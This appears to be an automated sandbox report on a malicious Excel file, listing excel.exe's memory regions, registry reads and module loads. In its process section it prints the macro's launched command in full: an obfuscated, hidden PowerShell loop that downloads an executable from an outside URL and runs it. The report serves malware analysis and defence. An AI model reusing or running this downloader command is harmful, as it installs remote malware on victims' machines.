23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77 (SHA256)
23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77.xls
Excel Document
Created at 2018-02-27 09:02:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: excel.exe
4046
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\excel.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:04, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:10, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa2c |
| Parent PID | 0x670 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B3C
0x
B38
0x
B34
0x
B30
0x
B2C
0x
B28
0x
B24
0x
B20
0x
B1C
0x
B18
0x
B14
0x
B10
0x
B0C
0x
AC0
0x
ABC
0x
AB8
0x
AB4
0x
AB0
0x
AAC
0x
A78
0x
A74
0x
A70
0x
A6C
0x
A68
0x
A48
0x
A44
0x
A40
0x
A3C
0x
A38
0x
A34
0x
A30
0x
0
0x
B48
0x
B4C
0x
B70
0x
B7C
0x
908
0x
8F8
0x
8FC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00226fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00231fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00240fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00262fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00282fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00292fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x00657fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x01beffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01bf0000 | 0x01ebefff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001ec0000 | 0x01ec0000 | 0x022b2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000022c0000 | 0x022c0000 | 0x023bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x023c1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023d0000 | 0x023d0000 | 0x024aefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x024b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000024c0000 | 0x024c0000 | 0x024c4fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024d0000 | 0x024d0000 | 0x0254ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002550000 | 0x02550000 | 0x0258ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002590000 | 0x02590000 | 0x02590fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x025affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025b0000 | 0x025b0000 | 0x026affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000026b0000 | 0x026b0000 | 0x026b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000026c0000 | 0x026c0000 | 0x026c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000026d0000 | 0x026d0000 | 0x026d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x026effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x026f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x02700fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002710000 | 0x02710000 | 0x02710fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x02720fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002730000 | 0x02730000 | 0x02730fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002740000 | 0x02740000 | 0x02741fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| comdlg32.dll.mui | 0x02750000 | 0x0275cfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002760000 | 0x02760000 | 0x02761fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x0286ffff | Private Memory | Readable, Writable |
|
|
|
- |
| xlintl32.dll | 0x02870000 | 0x038b1fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000038c0000 | 0x038c0000 | 0x038c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000038d0000 | 0x038d0000 | 0x038d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000038e0000 | 0x038e0000 | 0x038e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000038f0000 | 0x038f0000 | 0x038f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003900000 | 0x03900000 | 0x039fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003a00000 | 0x03a00000 | 0x03a00fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003a10000 | 0x03a10000 | 0x03a11fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| c_1255.nls | 0x03a20000 | 0x03a30fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000003a40000 | 0x03a40000 | 0x03a41fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003a50000 | 0x03a50000 | 0x03a50fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003a60000 | 0x03a60000 | 0x03b5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003b60000 | 0x03b60000 | 0x03b61fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003b70000 | 0x03b70000 | 0x03b70fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003b80000 | 0x03b80000 | 0x03b80fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003b90000 | 0x03b90000 | 0x03b90fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003ba0000 | 0x03ba0000 | 0x03ba1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003bb0000 | 0x03bb0000 | 0x03caffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003cb0000 | 0x03cb0000 | 0x03cc1fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003cd0000 | 0x03cd0000 | 0x03cd1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003ce0000 | 0x03ce0000 | 0x03ddffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003de0000 | 0x03de0000 | 0x03edffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003ee0000 | 0x03ee0000 | 0x03ee2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003ef0000 | 0x03ef0000 | 0x03ef2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003f00000 | 0x03f00000 | 0x03f02fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003f10000 | 0x03f10000 | 0x03f12fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003f20000 | 0x03f20000 | 0x03f20fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003f30000 | 0x03f30000 | 0x03f30fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003f40000 | 0x03f40000 | 0x03f40fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003f50000 | 0x03f50000 | 0x03fcffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000003fd0000 | 0x03fd0000 | 0x03fdffff | Private Memory | Readable, Writable |
|
|
|
- |
| segoeui.ttf | 0x03fe0000 | 0x0405efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000004060000 | 0x04060000 | 0x04071fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004080000 | 0x04080000 | 0x04080fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004090000 | 0x04090000 | 0x04090fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000040a0000 | 0x040a0000 | 0x0419ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000041a0000 | 0x041a0000 | 0x0459ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db | 0x045a0000 | 0x045c4fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000045d0000 | 0x045d0000 | 0x045d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000045e0000 | 0x045e0000 | 0x045e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000045f0000 | 0x045f0000 | 0x045f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004600000 | 0x04600000 | 0x046fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004700000 | 0x04700000 | 0x048fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004900000 | 0x04900000 | 0x050fffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x051fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005200000 | 0x05200000 | 0x05200fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005210000 | 0x05210000 | 0x05210fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005220000 | 0x05220000 | 0x0522ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x0523ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005240000 | 0x05240000 | 0x05241fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005250000 | 0x05250000 | 0x0525ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005260000 | 0x05260000 | 0x05260fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x05270fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005280000 | 0x05280000 | 0x0537ffff | Private Memory | Readable, Writable |
|
|
|
- |
| tahoma.ttf | 0x05380000 | 0x0542afff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000005430000 | 0x05430000 | 0x05477fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005480000 | 0x05480000 | 0x054fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005500000 | 0x05500000 | 0x05547fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005550000 | 0x05550000 | 0x05550fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005560000 | 0x05560000 | 0x05560fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005570000 | 0x05570000 | 0x0566ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005670000 | 0x05670000 | 0x05670fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005680000 | 0x05680000 | 0x05680fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005690000 | 0x05690000 | 0x05690fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000056a0000 | 0x056a0000 | 0x056a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000056b0000 | 0x056b0000 | 0x057affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000057b0000 | 0x057b0000 | 0x05baffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005bb0000 | 0x05bb0000 | 0x05caffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005cb0000 | 0x05cb0000 | 0x05cb0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005cc0000 | 0x05cc0000 | 0x05cc0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005cd0000 | 0x05cd0000 | 0x05cd0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005ce0000 | 0x05ce0000 | 0x05ce0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005cf0000 | 0x05cf0000 | 0x05cf0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005d00000 | 0x05d00000 | 0x05d00fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005d10000 | 0x05d10000 | 0x05d10fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005d20000 | 0x05d20000 | 0x05d9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005da0000 | 0x05da0000 | 0x05da0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005db0000 | 0x05db0000 | 0x05db0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005dc0000 | 0x05dc0000 | 0x05dc0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005dd0000 | 0x05dd0000 | 0x05e4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x05e50000 | 0x05e53fff | Memory Mapped File | Readable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db | 0x05e60000 | 0x05e8ffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x05e90000 | 0x05e93fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000005ea0000 | 0x05ea0000 | 0x05ea1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000005eb0000 | 0x05eb0000 | 0x05eb0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005ec0000 | 0x05ec0000 | 0x05ec0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005ed0000 | 0x05ed0000 | 0x05ed0fff | Private Memory | Readable, Writable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x05ee0000 | 0x05f45fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000005f50000 | 0x05f50000 | 0x05f51fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000005f60000 | 0x05f60000 | 0x05f60fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000005f70000 | 0x05f70000 | 0x05f70fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005f80000 | 0x05f80000 | 0x05f80fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005f90000 | 0x05f90000 | 0x05f90fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005fa0000 | 0x05fa0000 | 0x05fa1fff | Private Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x05fb0000 | 0x05fb3fff | Memory Mapped File | Readable |
|
|
|
- |
| {40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db | 0x05fc0000 | 0x05fc0fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x05fd0000 | 0x05fd3fff | Memory Mapped File | Readable |
|
|
|
- |
|
For performance reasons, the remaining 380 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
Registry (57)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\409 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\9 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 234, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
2 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cMd /c"poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 25;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('https://formaversa.co/trq','%localappdata%.exe')}while(!$?);&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%localappdata%.exe'"" | os_pid = 0xb80, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
Module (142)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefc140000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee5960000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fee6430000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7feff4f0000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee5bf0000 |
|
30 | |
| Get Handle | Unknown module name | base_address = 0x13f190000 |
|
1 | |
| Get Handle | Unknown module name | base_address = 0x7fef93e0000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | USER32 | base_address = 0x774d0000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feff4f0000 |
|
1 | |
| Get Handle | ole32.dll | base_address = 0x7fefe290000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\excel.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
2 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fef9463b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fef945a13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fef9461618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fef945f088 |
|
1 | |
| Get Address | Unknown module name | function = GetSystemMetrics, address_out = 0x774e94f0 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromWindow, address_out = 0x774e5f08 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromRect, address_out = 0x774e2b00 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromPoint, address_out = 0x774dab64 |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayMonitors, address_out = 0x774e5c30 |
|
1 | |
| Get Address | Unknown module name | function = GetMonitorInfoA, address_out = 0x774da730 |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayDevicesA, address_out = 0x774da5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feff4f2270 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feff4fa550 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feff5820d0 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feff57dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feff4f5c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feff4f6330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feff5166c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feff4f4710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feff4f48f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feff52b640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feff52b360 |
